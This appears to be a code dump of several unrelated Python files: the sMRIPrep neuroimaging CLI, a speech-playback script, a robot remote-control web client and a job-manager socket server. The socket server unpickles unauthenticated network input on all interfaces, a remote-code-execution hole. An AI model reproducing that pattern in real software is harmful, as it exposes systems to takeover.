default='auto', help='determiner for T1-weighted skull stripping (force ensures skull '
'stripping, skip ignores skull stripping, and auto automatically '
'ignores skull stripping if pre-stripped brains are detected).')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=Path,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
g_fs.add_argument(
'--fs-subjects-dir', metavar='PATH', type=Path,
help='Path to existing FreeSurfer subjects directory to reuse. '
'(default: OUTPUT_DIR/freesurfer)')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--fs-no-reconall',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store', type=Path, default=Path('work'),
help='path where intermediate results should be stored')
g_other.add_argument(
'--fast-track', action='store_true', default=False,
help='fast-track the workflow by searching for existing derivatives.')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the sMRIPrep developers. This information helps to '
'improve sMRIPrep and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
return parser
def build_opts(opts):
"""Trigger a new process that builds the workflow graph, based on the input options."""
import os
from pathlib import Path
import logging
import sys
import gc
import warnings
from multiprocessing import set_start_method, Process, Manager
from nipype import logging as nlogging
from niworkflows.utils.misc import check_valid_fs_license
set_start_method('forkserver')
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
warnings.showwarning = _warn_redirect
# Precedence: --fs-license-file, $FS_LICENSE, default_license
if opts.fs_license_file is not None:
os.environ["FS_LICENSE"] = os.path.abspath(opts.fs_license_file)
if not check_valid_fs_license():
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'sMRIPrep looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html'
)
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
smriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
bids_dir = retval['bids_dir']
output_dir = retval['output_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
retcode = retval['return_code']
if smriprep_wf is None:
sys.exit(1)
if opts.write_graph:
smriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
# Check workflow for missing commands
missing = check_deps(smriprep_wf)
if missing:
print("Cannot run sMRIPrep. Missing dependencies:")
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
smriprep_wf.run(**plugin_settings)
except RuntimeError:
errno = 1
else:
if opts.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(Path(output_dir) / 'smriprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(Path(output_dir) / 'smriprep' / 'desc-aparcaseg_dseg.tsv'))
logger.log(25, 'sMRIPrep finished without errors')
finally:
from niworkflows.reports import generate_reports
from ..utils.bids import write_derivative_description
logger.log(25, 'Writing reports for participants: %s', ', '.join(subject_list))
# Generate reports phase
errno += generate_reports(subject_list, output_dir, run_uuid,
packagename='smriprep')
write_derivative_description(bids_dir, str(Path(output_dir) / 'smriprep'))
sys.exit(int(errno > 0))
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows smriprep to enforce
a hard-limited memory-scope.
"""
from shutil import copyfile
from os import cpu_count
import uuid
from time import strftime
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
import json
from bids import BIDSLayout
from nipype import logging, config as ncfg
from niworkflows.utils.bids import collect_participants
from ..__about__ import __version__
from ..workflows.base import init_smriprep_wf
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running sMRIPrep version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
{spaces}
""".format
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = opts.bids_dir.resolve()
layout = BIDSLayout(str(bids_dir), validate=False)
subject_list = collect_participants(
layout, participant_label=opts.participant_label)
bids_filters = json.loads(opts.bids_filter_file.read_text()) if opts.bids_filter_file else None
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nprocs = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nprocs is None or opts.nprocs is not None:
nprocs = opts.nprocs
if nprocs is None or nprocs < 1:
nprocs = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nprocs
if opts.mem_gb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_gb
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nprocs - 1 if nprocs > 1 else cpu_count(), 8)
if 1 < nprocs < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'available CPUs (--nprocs/--ncpus=%d)', omp_nthreads, nprocs)
# Set up directories
output_dir = opts.output_dir.resolve()
log_dir = output_dir / 'smriprep' / 'logs'
work_dir = opts.work_dir.resolve()
# Check and create output and working directories
log_dir.mkdir(parents=True, exist_ok=True)
work_dir.mkdir(parents=True, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': str(log_dir),
'log_to_file': True
},
'execution': {
'crashdump_dir': str(log_dir),
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['bids_dir'] = str(bids_dir)
retval['output_dir'] = str(output_dir)
retval['work_dir'] = str(work_dir)
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
from niworkflows.reports import generate_reports
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, str(output_dir), run_uuid,
packagename="smriprep")
return retval
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid,
spaces=opts.output_spaces)
)
# Build main workflow
retval['workflow'] = init_smriprep_wf(
debug=opts.sloppy,
fast_track=opts.fast_track,
freesurfer=opts.run_reconall,
fs_subjects_dir=opts.fs_subjects_dir,
hires=opts.hires,
layout=layout,
longitudinal=opts.longitudinal,
low_mem=opts.low_mem,
omp_nthreads=omp_nthreads,
output_dir=str(output_dir),
run_uuid=run_uuid,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
skull_strip_mode=opts.skull_strip_mode,
skull_strip_template=opts.skull_strip_template[0],
spaces=opts.output_spaces,
subject_list=subject_list,
work_dir=str(work_dir),
bids_filters=bids_filters,
)
retval['return_code'] = 0
boilerplate = retval['workflow'].visit_desc()
(log_dir / 'CITATION.md').write_text(boilerplate)
logger.log(25, 'Works derived from this sMRIPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('smriprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
'--metadata', 'pagetitle="sMRIPrep citation boilerplate"',
str(log_dir / 'CITATION.md'),
'-o', str(log_dir / 'CITATION.html')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
    # Generate LaTeX file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('smriprep', 'data/boilerplate.bib'),
'--natbib', str(log_dir / 'CITATION.md'),
'-o', str(log_dir / 'CITATION.tex')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
else:
copyfile(pkgrf('smriprep', 'data/boilerplate.bib'), str(log_dir / 'CITATION.bib'))
return retval
if __name__ == '__main__':
raise RuntimeError("smriprep/cli/run.py should not be run directly;\n"
"Please `pip install` smriprep and use the `smriprep` command")
|
_v4__speech_playvoice.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import queue
import threading
import subprocess
import datetime
import time
import codecs
import glob
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
# qFunc common routines
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
qPLATFORM = qFunc.getValue('qPLATFORM' )
qRUNATTR = qFunc.getValue('qRUNATTR' )
qHOSTNAME = qFunc.getValue('qHOSTNAME' )
qUSERNAME = qFunc.getValue('qUSERNAME' )
qPath_pictures = qFunc.getValue('qPath_pictures' )
qPath_videos = qFunc.getValue('qPath_videos' )
qPath_cache = qFunc.getValue('qPath_cache' )
qPath_sounds = qFunc.getValue('qPath_sounds' )
qPath_icons = qFunc.getValue('qPath_icons' )
qPath_fonts = qFunc.getValue('qPath_fonts' )
qPath_log = qFunc.getValue('qPath_log' )
qPath_work = qFunc.getValue('qPath_work' )
qPath_rec = qFunc.getValue('qPath_rec' )
qPath_s_ctrl = qFunc.getValue('qPath_s_ctrl' )
qPath_s_inp = qFunc.getValue('qPath_s_inp' )
qPath_s_wav = qFunc.getValue('qPath_s_wav' )
qPath_s_jul = qFunc.getValue('qPath_s_jul' )
qPath_s_STT = qFunc.getValue('qPath_s_STT' )
qPath_s_TTS = qFunc.getValue('qPath_s_TTS' )
qPath_s_TRA = qFunc.getValue('qPath_s_TRA' )
qPath_s_play = qFunc.getValue('qPath_s_play' )
qPath_v_ctrl = qFunc.getValue('qPath_v_ctrl' )
qPath_v_inp = qFunc.getValue('qPath_v_inp' )
qPath_v_jpg = qFunc.getValue('qPath_v_jpg' )
qPath_v_detect = qFunc.getValue('qPath_v_detect' )
qPath_v_cv = qFunc.getValue('qPath_v_cv' )
qPath_v_photo = qFunc.getValue('qPath_v_photo' )
qPath_v_msg = qFunc.getValue('qPath_v_msg' )
qPath_d_ctrl = qFunc.getValue('qPath_d_ctrl' )
qPath_d_play = qFunc.getValue('qPath_d_play' )
qPath_d_prtscn = qFunc.getValue('qPath_d_prtscn' )
qPath_d_movie = qFunc.getValue('qPath_d_movie' )
qPath_d_upload = qFunc.getValue('qPath_d_upload' )
qBusy_dev_cpu = qFunc.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qFunc.getValue('qBusy_dev_com' )
qBusy_dev_mic = qFunc.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qFunc.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qFunc.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qFunc.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qFunc.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qFunc.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qFunc.getValue('qBusy_s_inp' )
qBusy_s_wav = qFunc.getValue('qBusy_s_wav' )
qBusy_s_STT = qFunc.getValue('qBusy_s_STT' )
qBusy_s_TTS = qFunc.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qFunc.getValue('qBusy_s_TRA' )
qBusy_s_play = qFunc.getValue('qBusy_s_play' )
qBusy_v_ctrl = qFunc.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qFunc.getValue('qBusy_v_inp' )
qBusy_v_QR = qFunc.getValue('qBusy_v_QR' )
qBusy_v_jpg = qFunc.getValue('qBusy_v_jpg' )
qBusy_v_CV = qFunc.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qFunc.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qFunc.getValue('qBusy_d_inp' )
qBusy_d_QR = qFunc.getValue('qBusy_d_QR' )
qBusy_d_rec = qFunc.getValue('qBusy_d_rec' )
qBusy_d_play = qFunc.getValue('qBusy_d_play' )
qBusy_d_browser = qFunc.getValue('qBusy_d_browser')
qBusy_d_upload = qFunc.getValue('qBusy_d_upload' )
qRdy__s_force = qFunc.getValue('qRdy__s_force' )
qRdy__s_fproc = qFunc.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qFunc.getValue('qRdy__s_sendkey')
qRdy__v_reader = qFunc.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qFunc.getValue('qRdy__v_sendkey')
qRdy__d_reader = qFunc.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qFunc.getValue('qRdy__d_sendkey')
playvoice_start=0
playvoice_beat =0
playvoice_busy =False
playvoice_last =0
playvoice_seq =0
def proc_playvoice(cn_r, cn_s, ):
global playvoice_start
global playvoice_beat
global playvoice_busy
global playvoice_last
global playvoice_seq
qFunc.logOutput('play_voice:init')
runMode = cn_r.get()
micDev = cn_r.get()
micType = cn_r.get()
micGuide = cn_r.get()
cn_r.task_done()
qFunc.logOutput('play_voice:runMode =' + str(runMode ))
qFunc.logOutput('play_voice:micDev =' + str(micDev ))
qFunc.logOutput('play_voice:micType =' + str(micType ))
qFunc.logOutput('play_voice:micGuide=' + str(micGuide))
qFunc.logOutput('play_voice:start')
playvoice_start=time.time()
while (True):
playvoice_beat = time.time()
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if (mode_get is None):
qFunc.logOutput('playvoice_:None=break')
break
if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
qFunc.logOutput('playvoice_: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
if (mode_get == 'PASS'):
#playvoice_last = time.time()
cn_s.put(['PASS', ''])
else:
playvoice_busy = True
onece = True
result = 'OK'
path=qPath_s_play
files = glob.glob(path + '*')
if (len(files) > 0):
try:
for f in files:
file=f.replace('\\', '/')
if (file[-4:].lower() == '.wav' and file[-8:].lower() != '.tmp.wav'):
f1=file
f2=file[:-4] + '.tmp.wav'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-4:].lower() == '.mp3' and file[-8:].lower() != '.tmp.mp3'):
f1=file
f2=file[:-4] + '.tmp.mp3'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-8:].lower() == '.tmp.wav' or file[-8:].lower() == '.tmp.mp3'):
f1=file
f2=file[:-8] + file[-4:]
try:
os.rename(f1, f2)
file=f2
except:
pass
fileId = file.replace(path, '')
fileId = fileId[:-4]
playvoice_seq += 1
if (playvoice_seq >= 10000):
playvoice_seq = 1
seq4 = '{:04}'.format(playvoice_seq)
seq2 = seq4[-2:]
wrkfile = qPath_work + 'playvoice.' + seq2 + '.mp3'
if (os.path.exists(wrkfile)):
try:
os.remove(wrkfile)
except:
pass
sox=subprocess.Popen(['sox', '-q', file, wrkfile, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
if (micDev.isdigit()):
os.remove(file)
if (os.path.exists(wrkfile)):
if (onece == True):
onece = False
qFunc.statusSet(qBusy_s_play, True)
#qFunc.statusCheck(qBusy_s_ctrl, 3)
#qFunc.statusCheck(qBusy_s_STT , 3)
#qFunc.statusCheck(qBusy_s_TTS , 3)
#qFunc.statusCheck(qBusy_s_play, 3)
if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
qFunc.statusCheck(qBusy_s_inp, 3)
if (runMode == 'debug') or (not micDev.isdigit()):
qFunc.logOutput('play_voice:' + fileId + u' → ' + wrkfile[:-4])
playvoice_last = time.time()
sox=subprocess.Popen(['sox', '-q', wrkfile, '-d', '--norm', ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#if (not micDev.isdigit()):
if (runMode=='debug' or runMode=='live'):
sox.wait()
sox.terminate()
sox = None
except:
pass
result = 'NG'
if (not micDev.isdigit()):
if (result == 'OK'):
cn_s.put(['END', ''])
time.sleep( 5.00)
break
else:
cn_s.put(['ERROR', ''])
time.sleep( 5.00)
break
else:
cn_s.put([result, ''])
playvoice_busy = False
qFunc.statusSet(qBusy_s_play, False)
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.05)
qFunc.logOutput('play_voice:terminate')
while (cn_r.qsize() > 0):
try:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
except:
pass
qFunc.logOutput('play_voice:end')
def main_init(micDev, ):
qFunc.makeDirs('temp/_log/', False)
qFunc.makeDirs('temp/_cache/', False)
if (micDev.isdigit()):
qFunc.makeDirs(qPath_s_ctrl, False)
qFunc.makeDirs(qPath_s_inp, False)
qFunc.makeDirs(qPath_s_wav, False)
qFunc.makeDirs(qPath_s_jul, False)
qFunc.makeDirs(qPath_s_STT, False)
qFunc.makeDirs(qPath_s_TTS, False)
qFunc.makeDirs(qPath_s_TRA, False)
qFunc.makeDirs(qPath_s_play, True )
qFunc.makeDirs(qPath_rec, False)
qFunc.makeDirs(qPath_work, False)
else:
qFunc.makeDirs(qPath_s_ctrl, False)
qFunc.makeDirs(qPath_s_inp, False)
qFunc.makeDirs(qPath_s_wav, False)
qFunc.makeDirs(qPath_s_jul, False)
qFunc.makeDirs(qPath_s_STT, False)
qFunc.makeDirs(qPath_s_TTS, False)
qFunc.makeDirs(qPath_s_TRA, False)
qFunc.makeDirs(qPath_s_play, False)
qFunc.makeDirs(qPath_rec, False)
qFunc.makeDirs(qPath_work, False)
qFunc.statusSet(qBusy_s_ctrl, False )
qFunc.statusSet(qBusy_s_inp, False )
qFunc.statusSet(qBusy_s_wav, False )
qFunc.statusSet(qBusy_s_STT, False )
qFunc.statusSet(qBusy_s_TTS, False )
qFunc.statusSet(qBusy_s_TRA, False )
qFunc.statusSet(qBusy_s_play, False )
main_start=0
main_beat =0
main_busy =False
main_last =0
if (__name__ == '__main__'):
    # Common class
qFunc.init()
    # Logging setup
qNowTime = datetime.datetime.now()
qLogFile = qPath_log + qNowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qFunc.logFileSet(file=qLogFile, display=True, outfile=True, )
qFunc.logOutput(qLogFile, )
qFunc.logOutput('')
qFunc.logOutput('play_main_:init')
    qFunc.logOutput('play_main_:example.py runMode, mic..., ')
#runMode live, translator, speech, ...,
#micDev num or file
#micType usb or bluetooth
#micGuide off, on, display, sound
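    # Example invocation (illustrative values, added by the editor):
    #   python _v4__speech_playvoice.py debug 0 usb on 777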
runMode = 'debug'
micDev = '0'
micType = 'usb'
micGuide = 'on'
micLevel = '777'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
if (len(sys.argv) >= 3):
micDev = str(sys.argv[2]).lower()
if (len(sys.argv) >= 4):
micType = str(sys.argv[3]).lower()
if (len(sys.argv) >= 5):
micGuide = str(sys.argv[4]).lower()
if (len(sys.argv) >= 6):
p = str(sys.argv[5]).lower()
if (p.isdigit() and p != '0'):
micLevel = p
qFunc.logOutput('')
qFunc.logOutput('play_main_:runMode =' + str(runMode ))
qFunc.logOutput('play_main_:micDev =' + str(micDev ))
qFunc.logOutput('play_main_:micType =' + str(micType ))
qFunc.logOutput('play_main_:micGuide =' + str(micGuide ))
qFunc.logOutput('play_main_:micLevel =' + str(micLevel ))
main_init(micDev, )
qFunc.logOutput('')
qFunc.logOutput('play_main_:start')
main_start = time.time()
main_beat = 0
playvoice_s = queue.Queue()
playvoice_r = queue.Queue()
playvoice_proc = None
playvoice_beat = 0
playvoice_pass = 0
while (True):
main_beat = time.time()
        # check playvoice_last (no playback activity for 90s ends the loop)
if (not micDev.isdigit()):
if (playvoice_last == 0):
playvoice_last = time.time()
sec = (time.time() - playvoice_last)
if (sec > 90):
break
# Thread timeout check
if (playvoice_beat != 0):
if (micDev.isdigit()):
sec = (time.time() - playvoice_beat)
if (sec > 60):
qFunc.logOutput('play_main_:playvoice_proc 60s')
qFunc.logOutput('play_main_:playvoice_proc break')
playvoice_s.put([None, None])
time.sleep(3.00)
playvoice_proc = None
playvoice_beat = 0
playvoice_pass = 0
#kill = subprocess.Popen(['_speech_a3_kill_sox.bat', ], \
# stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#kill.wait()
#kill.terminate()
#kill = None
# Thread start
if (playvoice_proc is None):
while (playvoice_s.qsize() > 0):
dummy = playvoice_s.get()
while (playvoice_r.qsize() > 0):
dummy = playvoice_r.get()
playvoice_proc = threading.Thread(target=proc_playvoice, args=(playvoice_s,playvoice_r,))
playvoice_proc.setDaemon(True)
playvoice_s.put(runMode )
playvoice_s.put(micDev )
playvoice_s.put(micType )
playvoice_s.put(micGuide)
playvoice_proc.start()
time.sleep(1.00)
playvoice_s.put(['START', ''])
# processing
if (playvoice_r.qsize() == 0 and playvoice_s.qsize() == 0):
playvoice_s.put(['PROC', ''])
playvoice_pass += 1
else:
playvoice_pass = 0
if (playvoice_pass > 50):
playvoice_s.put(['PASS', ''])
playvoice_pass = 0
break_flag = False
while (playvoice_r.qsize() > 0):
playvoice_get = playvoice_r.get()
playvoice_res = playvoice_get[0]
playvoice_dat = playvoice_get[1]
playvoice_r.task_done()
if (playvoice_res == 'END'):
break_flag = True
if (playvoice_res == 'ERROR'):
break_flag = True
#if (break_flag == True):
# break
time.sleep(0.05)
qFunc.logOutput('')
qFunc.logOutput('play_main_:terminate')
try:
playvoice_s.put( [None, None] )
time.sleep(3.00)
except:
pass
try:
playvoice_proc.join()
except:
pass
qFunc.statusSet(qBusy_s_play, False)
qFunc.logOutput('play_main_:bye!')
|
client_web.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from socket import *
from threading import Thread, Lock
import sys
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
# IP of robot
server_ip = str(sys.argv[1])
# port to connect to
server_port = 50007
# currently pressed Keys
pressed_keys = []
# Keys allowed to press
allowed_keys = ['a', 'w', 's', 'd']
# array which will be sent
array_to_send = [0, 0, 0, 0]
# lock protecting array_to_send across threads
lock = Lock()
keep_running = True
def running():
return keep_running
# encode an array of key-state flags as a byte string
def to_binary(num_list):
bin = ''
# get every item from array and add it to string
for i in num_list:
bin = bin + str(i)
    # return the encoded string
return bin.encode()
class my_handler(BaseHTTPRequestHandler):
def do_GET(self):
global keep_running
        # guard against short paths like '/' which would otherwise raise IndexError
        if len(self.path) > 8 and self.path[8] == '1':
keep_running = False
else:
if self.path[0:3] == '/?c':
global array_to_send
lock.acquire()
array_to_send = [self.path[4], self.path[5], self.path[6], self.path[7]]
lock.release()
else:
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
f = open("index.html", "r")
self.wfile.write(str(f.read()))
return
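# The control protocol assumed above (reconstructed from the index checks, not
# documented in the original): the page requests '/?c=' followed by one digit
# per allowed key plus a trailing quit flag, e.g. '/?c=10100'.
# A minimal helper a client script could mirror (illustrative only):
def build_control_path(keys_down, quit_flag=False):
    # one '1'/'0' per key in allowed_keys, in order, then the quit flag
    states = ''.join('1' if k in keys_down else '0' for k in allowed_keys)
    return '/?c=' + states + ('1' if quit_flag else '0')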
def web_server():
server = HTTPServer(('', 8080), my_handler)
while running():
server.handle_request()
return
# connect to server and send control signals
def connect_to_server():
# connect to the server
s = socket(AF_INET, SOCK_STREAM)
s.connect((server_ip, server_port))
# set reference array to compare that the client only sends by changes
global array_to_send
lastSend = array_to_send[:]
while thread_keys.isAlive():
# lock before entering area
lock.acquire()
# check for changes
if not array_to_send == lastSend:
# send to server
s.send(to_binary(array_to_send))
# copy input of array to reference array
lastSend = array_to_send[:]
# release area
lock.release()
    # close connection to server
s.close()
# init threads for key listener and sender
thread_keys = Thread(target=web_server)
thread_server = Thread(target=connect_to_server)
if __name__ == "__main__":
# start threads
thread_keys.start()
thread_server.start()
|
socketserver.py
|
# coding:utf-8
'''
Created on Feb 17, 2014
@author: magus0219
'''
import socket, logging, threading, pickle
from core.command import Command
def recv_until(socket, suffix):
'''
Receive message suffixed with specified char
@param socket:socket
@param suffix:suffix
'''
message = ''
while not message.endswith(suffix):
data = socket.recv(4096)
if not data:
raise EOFError('Socket closed before we see suffix.')
message += data
return message
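# A minimal client-side sketch (an assumption, not part of the original module):
# commands are exchanged as protocol-0 pickles (the Python 2 default), which
# always terminate with '.', which is why recv_until() above scans for that suffix.
def send_command(sock, command):
    '''Pickle a Command, send it, and return the unpickled reply.'''
    sock.sendall(pickle.dumps(command, 0))  # protocol 0 output ends with '.'
    return pickle.loads(recv_until(sock, '.'))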
class SocketServer(object):
'''
Socket Server
This socket server is started by clockwork server and only used to invoke methods
of JobManager
'''
def __init__(self, host, port, jobmanager):
'''
Constructor
'''
self.host = host
self.port = port
self.jobmanager = jobmanager
self.logger = logging.getLogger("Server.SocketThread")
def handleCommand(self, command):
'''
Handle one request command of client and return server's answer
@param command:Command to handle
This function return a Command object which contains result type and detail
information.
'''
cmd = command.cmd
try:
if cmd == Command.JOB_ADD:
jobid = int(command.data)
self.jobmanager.addJob(jobid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.JOB_REMOVE:
jobid = int(command.data)
self.jobmanager.removeJob(jobid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.JOB_RELOAD:
jobid = int(command.data)
self.jobmanager.reloadJob(jobid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.TASK_RUN_IMMEDIATELY:
jobid, params = command.data
jobid = int(jobid)
task = self.jobmanager.spawnImmediateTask(jobid=jobid, params=params)
return Command(Command.RESULT_SUCCESS, "Successful!", task.get_taskid())
elif cmd == Command.TASK_CANCEL:
taskid = command.data
self.jobmanager.cancelTask(taskid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.STATUS:
return Command(Command.RESULT_SUCCESS, self.jobmanager.getServerStatus())
        except ValueError as e:
self.logger.exception(e)
return Command(Command.RESULT_FAIL, str(e))
def process(self, conn, address):
'''
Thread entry where new socket created
'''
self.logger.info("Accepted a connection from %s" % str(address))
self.logger.info("Socket connects %s and %s" % (conn.getsockname(), conn.getpeername()))
cmd = pickle.loads(recv_until(conn, '.'))
self.logger.info("Recieve Command:[%s]" % str(cmd))
while cmd.cmd != Command.EXIT:
conn.sendall(pickle.dumps(self.handleCommand(cmd)))
cmd = pickle.loads(recv_until(conn, '.'))
self.logger.info("Recieve Command:[%s]" % str(cmd))
self.logger.info("Socket is Over")
def start(self):
'''
Start the socket server and enter the main loop
'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self.host, self.port))
s.listen(10)
self.logger.info("SocketThread is Listening at %s:%s" % (self.host, str(self.port)))
while True:
conn, address = s.accept()
thread = threading.Thread(target=self.process, args=(conn, address))
thread.daemon = True
thread.start()
if __name__ == '__main__':
    # Note: SocketServer requires a JobManager instance; None is only a placeholder here.
    server = SocketServer("0.0.0.0", 3993, None)
server.start()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
